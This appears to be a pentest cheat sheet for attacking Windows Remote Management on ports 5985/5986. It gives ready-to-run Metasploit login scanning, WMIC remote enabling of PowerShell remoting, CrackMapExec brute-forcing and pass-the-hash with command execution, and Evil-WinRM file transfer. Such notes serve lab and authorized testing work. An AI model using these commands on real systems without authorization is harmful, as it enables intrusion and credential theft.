WinRM 5985 5986
1. Metasploit - WinRM Login Scanner
use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.11.1.13
set USERNAME DISCO
set PASS_FILE /usr/share/wordlists/fasttrack.txt
set DOMAIN disco.thinc
run2. Activate Remotely Using WMIC
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"3. Bruteforce with CrackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txtcrackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
4. EvilWinRM
evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .upload local_filename destination_filenamedownload remote_filename destination_filename
servicesPowerview.ps1menu
Last updated